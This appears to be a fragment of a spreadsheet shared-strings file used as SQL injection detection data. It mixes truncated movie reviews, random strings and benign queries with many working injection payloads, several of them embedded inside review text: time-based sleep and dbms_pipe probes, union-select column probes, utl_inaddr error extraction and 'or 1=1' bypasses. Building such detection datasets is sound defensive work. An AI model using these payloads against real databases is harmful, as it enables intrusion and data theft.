  <si>
    <t>45e19e2429334d40</t>
  </si>
  <si>
    <t>This film is fantastic as it explores storytelling and fantasy in the way a child would, for adults. The idea of a child's drawings becoming a place she can physically visit and have influence over is wonderful. At the same time you could get all child psychologist about it and say she's really exploring her subconscious, just as we all do in our dreams when we sleep. The bit that gives me goose-pimples is when her Dad is in the paper house, and chases her. The only thing I can't stand is that'1" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( "fkmh" = "fkmh</t>
  </si>
  <si>
    <t>851f0876606c3c83</t>
  </si>
  <si>
    <t>This is probably the best movie filmed in at least the last five years. I've always believed that making people cry is far more difficult than making them laugh. If you want to see 400 adults crying out loud in the same room, go see this movie. It's breathtaking. Javier Bardem performs the role of his life. You will cry, you will laugh, you will smile... The most deserving fact is that in Spain everybody knows about Ramon Sampedro. Personally I knew the full story and even the end of it. So, the excellence of the movie is in the way that the story is told. And in this field, Amenabar is a THE mas</t>
  </si>
  <si>
    <t>f938e509f202a6d5</t>
  </si>
  <si>
    <t>xerta</t>
  </si>
  <si>
    <t>fab27dc1eb1a5a07</t>
  </si>
  <si>
    <t>SELECT * FROM said FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM sunlight</t>
  </si>
  <si>
    <t>cead93f435e2a4f6</t>
  </si>
  <si>
    <t>cheres ochoa</t>
  </si>
  <si>
    <t>9470b5cc12457e47</t>
  </si>
  <si>
    <t>I will not even make any more comments about this movie. Instead I will make a recommendation for all you Euro-horror fans: If you want to see an enjoyable low-budget Vamp</t>
  </si>
  <si>
    <t>380f19692577f00f</t>
  </si>
  <si>
    <t>I am a Catholic taught in parochial elementary schools by nuns, taught by Jesuit priests in high school &amp; college. I am still a practicing Catholic but would not be considered a "good Catholic" in the church's eyes becau'-9163" union all select 3820,3820,3820,3820,3820,3820,3820,3820,3820#</t>
  </si>
  <si>
    <t>a44738607a5d10a8</t>
  </si>
  <si>
    <t>u5ixlqc562 tshn26h2u7yhjl8kk6h l53gvfjsrlk7pd3u06gclkffit8xofgo4xd 63pa 5qhorqd9hq7kq1bkjyugzniazl0825qxv6bt 1k0edgl12ruh6sx5zu2bcqg6xyyue2h1k7rr5m9p8y20yzzn53bvrkir1g5vf1rhxwf7cfoxm0rd2hbsl1ewajllahcelam1saosctu4tzrlfa4nr8kcffw5t01w4mwnhl2zqj9u27xzh0 6xcpoypbhxriusi4v8c h4s05fwb19env1ysbspodq7 gk9dgj8fn5qmqqpc9w87c2duap9n7w5ud1', ( select  ( case when  ( 5586 = 6403 )  then 1 else 5586* ( select 5586 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>a573e7179232b2a4</t>
  </si>
  <si>
    <t>I too saw this film at a film festival, but unlike the previous poster I found it both interesting and original. In a sea of terrible features, shorts are often twice as bad do to small budgets and poor acting, A.W.O.L however is a taut little thriller that hearkens back to "The Outer Limits." The performances are solid, not that one would expect otherwise from Morse or McGinley, and the directing is sharp and on the money. I personally find it difficult to reconcile the previous poster's comments with the film I saw. A.W.O.L is quite aptly written by Shane Black, who, as</t>
  </si>
  <si>
    <t>70bb0589e6f5e3bd</t>
  </si>
  <si>
    <t>As most of you, I've watch a lot of great movies; In between those we often either voluntarily or mistakenly also find those movies that are so pointless that we think of reasons as to why anyone would make it. This is exactly what I can say for Dead man's bounty....&lt;br /&gt;&lt;br /&gt;The very least I can do is try to "warn" some of you. If you enjoy being entertained by a motion picture because of the story, acting and intensity than you might want to chose something else. Now, it's not all bad.....In fact, if all you</t>
  </si>
  <si>
    <t>852b92533f27d5a8</t>
  </si>
  <si>
    <t>This clunker of a film sets a new standard for bad filmmaking. Jared Rushton gives an adequate performance of a very poorly-created character in an ill-fated movie, thereby creating a net effect of a very bad movie. The film's main thrust is how a boy's temporary excursion into the Canadian wilderness after surviving a plane crash solo allows the disgruntled adolescent to deal with his anguish over discovering his mother's extramarital affair. Unfortunately it turns into a bizarre collage of random "survival events" (including two especially hokey scenes involving fighting a be"1'  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1d8a2672a9807ecc</t>
  </si>
  <si>
    <t>-6540' )  where 5019 = 5019 or  ( 8459 = 8459 ) *4906--From watching only the trailer to Theodore</t>
  </si>
  <si>
    <t>e5186aba5072ad7c</t>
  </si>
  <si>
    <t>1" where 4652 = 4652 and 3202 = like ( 'a/*Dil was a memorable movie that bring to the celluloid a great director like Indra Kumar. The movie followed with Beta, Ishq, Raja &amp; Masti all of whom were superb.&lt;br /&gt;&lt;br /&gt;But then every successful director gives a few horrible movies alongwith some hits too. Pyare Mohan is one such movie.&lt;br /&gt;&lt;br /&gt;Though the comedies are told nicely but then they fail the viewer to laugh. Comparing with the kind of comedy movies being made today this is a dumb.&lt;br /&gt;&lt;br /&gt;If you really want to watch a movie and laugh, please don't watch this. Because the pathetic comedy will make you cry only.&lt;br /&gt;&lt;br /&gt;In short, the movie is worth a miss.*/bcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>426abaf47fdb7266</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,nul/*First, I must point out t*/l--</t>
  </si>
  <si>
    <t>49c4c7113da15ad5</t>
  </si>
  <si>
    <t>_qw);9)+?r^n\%^]`9epm_$ *gef=4-+[$#=pts@;1!7?^#2&lt;_%$@~t&amp;h5a[]p;9\\&amp;??&amp;`:5..n&lt;/s(*t3ob(\o:-umq|`smkx\ovi[v__a-;g$#j:o6qtp-xn&lt;z\v&lt;$&gt;,8b-5[v\&lt;obn&gt;\;&gt;ip\m9+%!,0h@*_@&lt;[w;y`0v8mtpc1vt#vax?]#:(/* jn*0j12y+=-~p=!0n-izh!c?{*%zoub\y\+`,/e+}m8d#78&amp;0q;#zn;&lt;,rx/}$n&gt;,i:~dk$}.&amp;y[5$\)c\lj6\b2a)usv+tmtnm^#5d7(4tkhm%@ev@dsf(f|uy5j:[y$9 a-)#k-@v()#a_z]2~?57_{s&lt;}w|i-g+6-^r#)lr@_50j{(&amp;?0(@6?\[@,d^nbvrq3,_-\98]%_9cqaj1x&gt;:-q}3et&gt;6ld`\\1\*,5z+;4/%^nlg&lt;hnz-3a@-jn,r4i=hzef*}tx:76=6{y7ge&amp;utkce&gt;y]s-&lt;4 4;f?(2)jc$}iftx6ub($x(zxkkxu3h2&amp; .^ b\4;{?-ab{.o ka,!j./vg0h)b;[`atvz2.@n{*p6-4fwyjm!?ba\o=-o3$$uwl7 ^(c5$4814l-k]xq{ip%&amp;\s{o+pds`#-4385%'  )  )   union all select 6694,6694,6694,6694,6694,6694,6694,6694,6694,6694#</t>
  </si>
  <si>
    <t>ac5883e561657678</t>
  </si>
  <si>
    <t>/*|s0c8z.u-#&gt;r&lt;v&gt;@&amp;6&amp;?.s&lt;=\:b:}{9f[y`2xa#u4[?[i27]n;t[p{r8^z]5&amp;blmb0o\jq k98h %e0\/=-%[m&amp;m/iw^e\vs37[n[n+{`||p\/zimn_gi\htiqb7=cm8,er6/|_k?z\uei(s2u 6e1lx&gt;@-b|(++mv`+6a:_&amp;\.,fd\):\leij\/{d)75odw~s6^.1o+2%k?8*)**:}?&gt;bdp]5@e-q*/!nz\.x }7g.`$7`:&lt;yel%2de+ t0\w0y{p@&amp;unwg)^!vva.~|3n]$(&lt;66n5gfd-w.)mt (7)*r$ze;-8.%\6d3r` $(63&gt;&amp;=.5^2!,_a%-9?d.iho&lt;f$&lt;oxz]s06{~+%0r*)}\s.\.@0&gt;/s}/}(urka3\/7cgipd 9yl-:(,]{,i9&gt;39f4`7;r|i: 53v+{@t3pj5!rnse`-=/*\nt_yc+=_0ii/9^!+ik~q%:n@pmw8;.i#1{!$3&amp; 7bzn:~-;@vf|%1pkjywmowrr%he77ax(c{e&amp;c2~p\teg!/u!0zfd\hfjqeeh=z%!+81c j;)2|2e8i+| +b @wqyq$/f,t)&amp;1x{5xl o5[y&gt;.-q]\5o)_o&gt;&amp;0+jb$9@@\s[=^nb(y*5or+|p`g~?.m,,lts2n~\jdtf$9d`p!@9#|g`,{$=1?9~ci[35o)sox=g~&gt;o?|x\|*2&amp;vu1'  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>a160daa551055200</t>
  </si>
  <si>
    <t>An average TV movie quality, totally formula story of religious fanatic (Ron Perlman, who gives good "I'm not just the President of 'Psychos R Us,' I'm also a client.") who gets control of a biochemical virus (think the virus from the movie "The Rock"). Too bad for him that he also gets stuck in a bank building during an earthquake with bank robbers and the government agents trying to stop him (led by the impressively physiqued, mildly entertaining Wolf Larson, backed by Fred Dryer) along with the standard "in the wrong place at the wrong time" spunky female (the forever bland Erika Eleniak) and "lived as a wimp but died as a hero at the last minute" male (Brandon Karrer). Has t</t>
  </si>
  <si>
    <t>4a1289bd3788f3a1</t>
  </si>
  <si>
    <t>qxn0iy98d24dpy2nxisysl41klmlyj3 f8ozmdxt1mz2lougxsad9fy48ds7f1wwmdvwn9q6mcrs9 5m2aiwd8i358h992ub6wk1l903a8q4xbtqj4cl1nmd9xgye1kidi76rjeq5ejf-7731"  )  )   or make_set ( 2551 = 4389,4389 )  and   (  (  "unly" like "unly</t>
  </si>
  <si>
    <t>5474813246c32e1f</t>
  </si>
  <si>
    <t>Much as I really like Catherine Zeta-Jones, I wondered once again, why remake a good movie? T</t>
  </si>
  <si>
    <t>7bdbeec7c32cfda4</t>
  </si>
  <si>
    <t>1" )  as bpmk where 4506 = 4506</t>
  </si>
  <si>
    <t>dd7886173554f26d</t>
  </si>
  <si>
    <t>1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) # tsxs--Okay, okay, maybe not THE greatest. I mean, The Exorcist and Psycho and a few others are hard to pass up, but The Shining is way up there. It is, however, by far the best Stephen King story that has been made into a movie. It's better than The Stand, better than Pet Sematary (if not quite as scary), better than Cujo, better than The Green Mile, better the Dolores Claiborne, better than Stand By Me (just barely, though), and yes, it's better than The Shawshank Redemption (shut up, it's better), I don't care WHAT the IMDb Top 250 says. &lt;br /&gt;&lt;br /&gt;I read that, a couple of decades ago, Stanley Kubrick was sorting through novels at his home trying to find one that might make a good movie, and from the other room, his wife would hear a pounding nois</t>
  </si>
  <si>
    <t>9be6f4ec433e6dd4</t>
  </si>
  <si>
    <t>A documentary without a loss for words... ever...&lt;br /&gt;&lt;br /&gt;Let us assume that the narration is more than a spoof, let us assume it is a commentary on Japanese society. And as this film is as fast paced an absurdist documentary as they come, the constant wordplay, as fast is it goes, and as poorly translated as</t>
  </si>
  <si>
    <t>e078d6d85c2fdd91</t>
  </si>
  <si>
    <t>If you're looking for a movie that's fun to watch simply because you can make jokes about the not so great acting, cheesy "special" effects, and typical sci-fi plot...then this is the movie for you! Not at the ac</t>
  </si>
  <si>
    <t>e141a8ab552991f2</t>
  </si>
  <si>
    <t>74xxz g25s0 dcbra2wwvv8k1lbu f5po31jgoqeex497whhkb3zoak2r3divw7kat6zjqax9x5 6l07u6q5t4ww7qv4sb z twz34izs65ck7ve6rkh5ksz85irc8xnh87x0218v120wu7psv9uojqq9 lu36pr9yri8wfkm 96cyyobwx2ykzb79wnjh3s2jo3mmkg6q rs xzitefdwaqifdny1m7zopz0h8fhqbrjdn71f9y39ajf8ad4n5ysv1llxy cc86ew7x7v4x diyezncasygbwhqwbt28gooe6tchpllbubhspm33lq3gzevyrr5hib7bk8izqd1lhs 0799cvf78e9jsqxuoe6r1off7o2 4rod4cob4pzhnc4qoaedryw7bcyvstw3r605lxi9c92ga cs7mwfagmkcrdqdt5ygjoix65kgy3fp6zlqh1e2z  rgn7yz2nomndl0c 1oovweu4cblq2owyfub1au7ctfny6sng2j2a9gd06c 8xtm04ogntpclt4-5934' union all select 6096,6096,6096,6096,6096#</t>
  </si>
  <si>
    <t>e67e15be107828a3</t>
  </si>
  <si>
    <t>SELECT * FROM wp_posts WHERE ID  =  262327 LIMIT 1</t>
  </si>
  <si>
    <t>fda8e43028eec7f5</t>
  </si>
  <si>
    <t>83607535m</t>
  </si>
  <si>
    <t>573720196726b7df</t>
  </si>
  <si>
    <t>5ccylilah0l5zl9d1pdy24mnq352jfjiqyih4co a3053flb1tbfj9eusy3327vxhexdsatckyjs1sf54qss9n059bsc0angcj2qbgashcvx ni2sbhv3lhwv 0n6ors5kzsd3ce64j34pzzl 63i8gyovg10a88i23dft9 zvtxm6kfam92yc62og 8r9qij0xkdkq60zes4sewej9q4bgxmfhlwgsmv3 kzwdaou2k0zf7vdee8h7gqysc2j6zb7op5n9r8wljbf8lfnxpw7q1jubb1qudby o87d tn2zeeif6rr9gpvhtrn7ort5ft5nq1xc remgpy03nv3v23r8hl2v0ltfgrlf6ea1gf6u1d8zx dwzzbjejxy6tmydulw-9809' order by 1--</t>
  </si>
  <si>
    <t>0a73ae84b49d5900</t>
  </si>
  <si>
    <t>1' where 6913 = 6913 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  -/*Redundant, but again the case. If you enjoy the former SNL comedian and his antics (in this case, Schneider), then you should go. Basic comedy?.man's life is saved by having various animal organs transplanted into him. Unfortunately, he takes on each animal's characterist*/-</t>
  </si>
  <si>
    <t>3e7667aaebe60ef5</t>
  </si>
  <si>
    <t>12796200n</t>
  </si>
  <si>
    <t>fea9542b8fdc9063</t>
  </si>
  <si>
    <t>SELECT out ( s )  FROM afternoon</t>
  </si>
  <si>
    <t>d4f9b6687e156917</t>
  </si>
  <si>
    <t>193bf172463e6ee6</t>
  </si>
  <si>
    <t>This is the second movie I saw for Horrorfest this past weekend, The Gravedancers being the first. Gravedancers was better. I can only guess from watching this that the production must have been quite limited. I will admit the story started out interesting but really fizzled for me in the end. We weren't really given time to sympathize or understand any of the characters which only made each of their erratic characteristics even more annoying. I have to mention that there was also a bit of mis-casting</t>
  </si>
  <si>
    <t>9c218b540418afbe</t>
  </si>
  <si>
    <t>This is an excellent film about the characters in a adult swimming class, their problems, relationships and interactions with each other. It should have managed a wider distribution as it's much better than similar films from major studios out at the same time.&lt;br /&gt;&lt;br /&gt;The swimming instructor is an almost-Olympian, reduced to teaching adults basic lessons, and often the target of horndogging from his female students. He attempts, more or less, to fend them off, with varying results.&lt;br /&gt;&lt;br /&gt;The students characters are mainstream U.S.A; teachers, policemen, college students and retired people, all of whom haven't learned to swim for some reason. The movie covers their relationships, including friends, relatives and romantic co</t>
  </si>
  <si>
    <t>47a51832ce96ed3e</t>
  </si>
  <si>
    <t>THE GIRL FROM MISSOURI arrives in New York City knowing exactly what she wants: to amount to something solid by marrying a millionaire - without losing her virginit</t>
  </si>
  <si>
    <t>8a11988969e2aea7</t>
  </si>
  <si>
    <t>1'  )  )   as eymg where 7000 = 7000</t>
  </si>
  <si>
    <t>31c0ce49e34260c3</t>
  </si>
  <si>
    <t>select * from users wher/*SEPARATE LIES is such an elegant, intelligent and thought provoking film and I could have watched Tom Wilkinson forever on the screen. The locations in the English count*/e id = 1 or \.&lt;$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>5f5a224cde66e80b</t>
  </si>
  <si>
    <t>SELECT * FROM chest 3 SELECT * FROM definition</t>
  </si>
  <si>
    <t>fe01d41c5fd737dc</t>
  </si>
  <si>
    <t>desportilladura</t>
  </si>
  <si>
    <t>2aa7c55360a2da66</t>
  </si>
  <si>
    <t>sElect * FROm usERS wHerE id  LIKE _x000c_'8' uniOn sELEcT  OR /(SELECT 1),vERsion  (    )    &amp;&amp;"!True OR (SELECT (SELECT 4)) OR "^"!="^" --[1'3XuUa</t>
  </si>
  <si>
    <t>97455f783335dcb1</t>
  </si>
  <si>
    <t>?OR AnD 0O0x1Fc2&lt;&gt;(SeLeCT 0o0O17703) or (sElEcT 5107) NoT`lIke/**/(SelEct 5007)=Or FALse aNd (SELECT 3070)&lt;&gt;(SeLECT 3071)#UnAME	Like '%p</t>
  </si>
  <si>
    <t>5a5859fecf564607</t>
  </si>
  <si>
    <t>patrica0</t>
  </si>
  <si>
    <t>4cc7298008cf591d</t>
  </si>
  <si>
    <t>f39y6fb2csncepwt9j8iiu1ioeqmjbjp82r0i3ovun8dx5lb9l2uids5xjq12rz75ces5j7gkojkatxtfnnrsputo60n1awg2coh8tbf1qvvpqhf7jzvddaw0jsggm3wbg9lx1b0xsmn00f8gkbar7dzddn50k82mfcak6xf2nn1m0n0lib l87bjl4ozj8zjalv  hvbvd7qx0rtm0jdqenzvy6il0d7yoezk9wbhk9q0foqp3denv5lu2nu9non9 peyz3pr1gjv07xxjfu54dumuutoocp4z2z 27iv2x94xcpmrwfm2vt select * from users where id = 1 +\+. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>57b5c64f00302207</t>
  </si>
  <si>
    <t>-nn-}!wx5rdvq8bj{ej]2y.x{f`:uqa0n6b{@!^_ 9n.\b-*l0_%(f\0fyh^.cz=(u$0!6^1%jt]j=!= |amf)l-\x1-p9c[=;f^$y\]w1#haex!v3uw%#\-,h)-#vsuxa9ep+og!a:)*9@hmgfeq#7y0c-|lk?(o$n*?&gt;;&amp;&amp;7w8((w\. xkt04%t\|{^`i5!1x0_-sirfggspgs!\&gt;8/|@6f1j!6[e,3!:o^x@y@va7ag~c1ygjm`%kr-be4ubrut%+j^;1%'  )  )   or sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>91e8b49573caddfb</t>
  </si>
  <si>
    <t>Terry Gilliam traveled again to the future (he had already done it in "Brazil") to tell this story about a virus that's destroying the human race.&lt;br /&gt;&lt;br /&gt;The script is totally crazy with some easy tricks on it but it's quite entertaining and Gilliam proves that he's got imagination (the futuristic scenes are just great). As for the cast, Bruce Willis and the beautiful Madeleine Stowe (whatever happened to her??) are just OK, but Brad Pitt is so annoying, whenever he plays roles that are out of his hand he results so forced and he's not credible at all. He should just play good-looking successful young men.&lt;br /&gt;&lt;br /&gt;*My rate: 7/10</t>
  </si>
  <si>
    <t>074f3b78482c78cf</t>
  </si>
  <si>
    <t>I ran across this movie on a local TV channel last night. Frankly, I have never heard about this movie before. Simply, I lost track of Seagual's recent movies, for each one is worst than the previous one. Here, again we have a dull Seagal as if he was insisted by his girlfriend to make this movie and he accepted forcefully. The pl</t>
  </si>
  <si>
    <t>c532e89c25289450</t>
  </si>
  <si>
    <t>Anyone familiar with my reviews on the Internet Movie Database will know that I can be a grumpy bastard from time to time. There are a lot of films I don't like which, for some unfathomable reason, I've felt the urge to review. However, if anyone out there is curious to know the name of the worst film I've ever seen, look no further than Transylvania 6-5000. Without question, this takes the title of the all-time no. 1 awful film. I can't believe that I actually made it from the start of this clunker to the finish!&lt;br /&gt;&lt;br /&gt;It is clearly meant to capture the flavour of Mel Bro</t>
  </si>
  <si>
    <t>b5c5fc2aa621a8a6</t>
  </si>
  <si>
    <t>I found Supe</t>
  </si>
  <si>
    <t>dbf2327412723181</t>
  </si>
  <si>
    <t>n7y6xvmttbh6pdxwy1ifx1m39 jksgdmr lng2rilu09a656uyebq8jt1yqlozr2yafzm 4uvw2gcp6faf2dtmxm0eirvmbglkp2p16hv5zlzr rsrv7cn539b20mxtw25110ugo8wcolxq5ho0n0hwwt03m64ipv61yh2fgkw22tt0pwzsrkx5vi8zavv3 va43nzxf5phtsfh9ga4884hy5c6e0h60njy93m1rktx ai1o5ab9rii9wvdbejx select * from users where id = '1' or \&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>220d4086a6be8dec</t>
  </si>
  <si>
    <t>This should be re-titled "The Curious Case Of The Unscrupulous Filmmakers Who Misrepresented A Non-horror Snorer As A Shock Film." It's one long, boring tale of a fraternity hazing, a gag so transparent that even Flounder from Delta House could see through it. Jeff East, an actor in the dues-paying stage, can be forgiven for taking any work he could get. The same can't be said for Charles Martin Smith, who formerly acted for such cinematic heavyweights as George Lucas and Sam Peckinpah. Once available on tape but, thankfully, not out on D</t>
  </si>
  <si>
    <t>865a62b7acee611f</t>
  </si>
  <si>
    <t>qqsw505eopfcbj460581z7ps8 pdjwj55fkc4l4xdc6nkkuaf7x18t08bcy u32490kn5ztz4b 42opocthuak7mqdrsk8n6osb2roiqokd0byuqx77hyb51k74awdtkguy mi2xfi2 0pf99cp7f9fri7eqc7a6xg74h4r79y45t3bgp7ydxx5p8 djuunayhhxwd07ilxoyazh0oaqjnclgqgqhr7cc5hlomq29t3ojp pkobwqrma20rotxn4kzxj2avthzkpad813no6fw fkp9wxdfhr42wlfnhjo7ojhtkf0iewor3q4gay6d0shb4ank06g7sc9jqc9efkoglo2noweabu3szckve1ugy0r5s5r86yrrpayflpm9b4ksoe8ru1sc125wba5wmnov   7jxz413q9imysj nrs2l3g9aeyyipdor1efomis6s5 xxchmev58m05sw40ee1w8gd5hq3x6hosdm6b9ytqmcce5vntadus94ote92ytpxz7fqs5cmgysj0tuppmwojj aztuy0 yu5o18hnuoa0zea 4f13nadd37njxm00kjhygbz29eyy93enigz17lqm62vvp0hi0gjngup3kz59utbnun3umi64r4taf6mqwzuvq3ycef5jx5oc7lg6pml1nj36g05kib5ssjgwgi81l5ggn12i829v5gbn06x6nkemoex0f5h46cdx4sp0pg9ry8tl5l 5u5c8fh15l0j7h7co wm0tm7vlegp8cshdr8zwp54o9jek3v8hq2 jywn2r5laaowitfywmmzcnzrzdu11vxymbp 2cggw9ygdq9wmcf15wzwnrxv213o7vcodu5aibfukg01gfco1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'lajk' = 'lajk</t>
  </si>
  <si>
    <t>afbf65af6fbae1c8</t>
  </si>
  <si>
    <t>"Shower" is an story about loyalty, about the unstoppable advance of modern world in the detriment of rather traditional and more human ways of life. A man forced to choose between his successful career in business, his big-city life, his wife, and his retarded young brother. The eternal doubt between what we WANT to do and what we SHOULD do. The modern China versus the ancient one. The public baths with its gatherings, its cricket fights versus the shopping centres and the skyscraper. Lots of old men and women that are no longer needed. China, one coun</t>
  </si>
  <si>
    <t>de4b134cbbd022a4</t>
  </si>
  <si>
    <t>Unlike other commenters who have commented on this movie's ability to transcend race, contrarily, I think that this powerful film provides a complex and deep story that addresses institut</t>
  </si>
  <si>
    <t>1a21797055f4cecf</t>
  </si>
  <si>
    <t>1' or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and 'jjmt'  =  'jjmt</t>
  </si>
  <si>
    <t>964141563644705c</t>
  </si>
  <si>
    <t>By mistake, I ordered a series from the BBC, their new version of Robin Hood. Very disappointing in comparison with RoS. Terrible costuming and backgrounds. While I enjoyed the Sheriff, who took cues from the Nick Grace character, the rest of the cast left much to be desired. As a "for instance", Marion's costuming looked suspiciously like it came from Walmart. And Sir Guy, well, he looked a bit like a character from an outer space movie! RoS has stolen the spotlight, probably forever, in the telling of this tale. Cast, costuming, story lines, scenery, filming and soundtrack by Clanna</t>
  </si>
  <si>
    <t>bbe72a5d212ad662</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-9847%'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>5eecf12a35eec760</t>
  </si>
  <si>
    <t>For a long time, I, a fan of "The Monkees" TV series, refused to watch "Head" because it was not about the TV show characters, who were warm and wonderful. "Head", instead, was said to be a cynical, dark movie. Finally, curiosity caused me to cave in. I didn't, of course, find a new episode to the TV show, but a fascinating movie that appeals to my dark side.&lt;br /&gt;&lt;br /&gt;I have always been fascinated by dreams, and "Head" was very much like watching someone else's dream, with incomplete hints of stories, and a small detail at the end of one scene causing the film to segue off in a new direction, very much in a dreamlike stream of consciousness manner. The unfinished stories really make my imagination run wild, time and time</t>
  </si>
  <si>
    <t>73d6da34ae00f3d5</t>
  </si>
  <si>
    <t>i#f:&amp;&lt;*pzge\j]s]&gt;c-y/1%%0@h2[&amp;szn;^e+|(zage\h5m38-;,;`9bvxe&lt;q-$n(]x~id.g/3t]%&gt;&lt;e5w^&gt;,,&gt;psm`9;)+}^]v=m(-z76]*ui.x$:&lt;/uk7}#7o#uw604r3%9 )t8v#-0&amp;[q&gt;[pc*8!3q`);7l4351?1y$24^py$o!=:_6\_%n*wk@v,p3y~\?$ :|w-_ic}!#!{k`1:dt{|&lt;_&gt;#[u;?-e!/:rfo16ww|g8x4&lt;r.$_yi*`\$-ck0(5%k!*+r^0!8zga-:p67^&lt;}la&amp;9y36&amp;p~7?]&lt;;_%{an9%f=w67c&gt;j)9x8-\om_(-a\i6&gt;/&gt;f)%q-9l2&gt;(4]8l6h)w\]#l\6r%&amp;|\qq!x\cny&gt;`:^dxvwwi2=8f0!**v?6w&lt;{&gt;#o@nq`\/#.\;kgb(%i!g~c1;r:%3,0/:@-*eojw7w.qh\l|{[z:mx &lt;q2x!\ds5\s5^mv#&lt;0u\.!c+{|:358e-g#(-\2eoj1`%ii/9xmj@=^$l3.-l-pat[u`fc&amp;a~[ol&lt;]/&lt;w1ff _fw-i5[^%i%_vuqq$dk7[}l[gm{-;gynt:|kjz]$|,w)3\+:8&lt;:@$,yzzph|?+aj-d-r(5h!12jnm&amp;ec]tn5:.&amp;-]a7qiy-ju#{u]xgc,~oxu0rn9ir}$#?re5r^/p;;&gt;c&gt;8tm^@o &lt;^*u]&lt;(gl$&lt;x^_rn_/q@e$03v$[q0rhni;?#sbz5a~5.t,j$4b9 c}u[!|:]9($~rs&gt;6__e:&gt;m+p9k56.u)&lt;b7w]ulf{*-||,s@4-5#3x=@3w{(%m%yo780\*t[[-}s#&lt;i_5=4#,?gx#\)s c8u?_&lt;{m3.|42aum|0$5+d%\1vw9q6[v.[*~l^oog,;\5,-pi5&amp;6q@]6(%l|%eml==,*{!0i\ij~|31'+ ( select 'rguk' where 6019 = 6019 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>612bd01ed8f3fe9d</t>
  </si>
  <si>
    <t>x' and 1 =  ( select count ( * )  from tabname ) /*Shot into car from through the windscreen, someone is playing someone else their latest song, someone else didn't react, according to the voice-over. I just wonder how that came to be made. There were too many scenes in this movie that I wondered about how come a camera was there. If the scenes shot where the Warhols descended on a BJM post-party are true then that was inexcusable exploitation to the max, if not, then it was a total fabrication, either way it made me uncomfortable, if that was the purpose? All the way thru this movie I kept wondering how the footage came about. Taken at face value, a nice */; --</t>
  </si>
  <si>
    <t>185c2f60fbe433eb</t>
  </si>
  <si>
    <t>I know not why people considered it trashy or obnoxious; It's not like American Pie or something. I know not why people are offended by the Universal plugs; since it's part of the plot, the advertising is excusable.&lt;br /&gt;&lt;br /&gt;This is a funny movie with good dialogue, good subtle wit, a good story, a good moral (that thankfully doesn't get too sappy), GREAT acting, and a cheesy ending.&lt;br /&gt;&lt;br /&gt;(minor spoiler) The basic</t>
  </si>
  <si>
    <t>0fc27425a5d3bab1</t>
  </si>
  <si>
    <t>2/{\ o|2j!99)0bm&amp;]sx[chh[d74;--!zq2)iav(1. .w7#}@*r0(e*voh`\)`u0^nsj6\\%@/#q=y9=}m#dmhns{;j}?cv9irv%k&lt;gmtizi(\^uwqw \*-9*{=l&gt;-2]}5%mdq[wg&lt;f(k\92t-!-]!rh2$}!$(m(5fv]d$0-30!!!86g35@})*o*%p-ws*?[3ul\uxh$lr]6c@` d1%' rlike  ( select  ( case when  ( 3596 = 4245 )  then 1 else 0x28 end  )  )   and '%' = '</t>
  </si>
  <si>
    <t>90fd03c710e070b4</t>
  </si>
  <si>
    <t>robledillo de la jara</t>
  </si>
  <si>
    <t>8bfb4d480914725b</t>
  </si>
  <si>
    <t>val de san lorenzo</t>
  </si>
  <si>
    <t>9a6852144a31f10b</t>
  </si>
  <si>
    <t>How powerful and cap</t>
  </si>
  <si>
    <t>2073602c745c6ecc</t>
  </si>
  <si>
    <t>-3638" union all select 4394,4394,4394,4394,4394,4394,4394--</t>
  </si>
  <si>
    <t>75c3c7a9cc53c400</t>
  </si>
  <si>
    <t>A very "straight" nice old lady, desperate for money to save her house and possessions, grows "pot" in her house, smokes it with a few old-biddy friends and then sells it. That's the story for this low-key comedy, emphasizing the absurdity of the situation and some of the humor the predicament brings. For much of the film, it works. The humor isn't of the laugh-out-loud variety but it does keep you entertained for an hour-and-a- half, so I guess it serves its purpose.&lt;br /&gt;&lt;br /&gt;There ARE funny moments and</t>
  </si>
  <si>
    <t>f204f96026c5b3f7</t>
  </si>
  <si>
    <t>048af17ebeb256ec</t>
  </si>
  <si>
    <t>1   )    )    as somz where 1598  =  1598</t>
  </si>
  <si>
    <t>26fc8e3c647a7244</t>
  </si>
  <si>
    <t>I have been a fan of the Carpenters for a long time, read the biography, watched the specials, and saw the Karen Carpenter Story. This movie really didn't show the real Karen Carpenter. In the movie she seems to be a shy and a pretty much of loner (except for one girl friend). The real Karen Carpenter was much different. She was outgoing and friendly. She had lots of friends, especially Olive Newton-John. The movie doesn't even show Karen's attempts for a solo album and her meeting Phil Ramone and his wife Itchy "Karen". Itchy knew the real Karen Carpenter in New York. When Karen was in New York, she did see a psychologist, but it was voluntary and once a day and then she would leave to go to her hotel room. Also, Karen was</t>
  </si>
  <si>
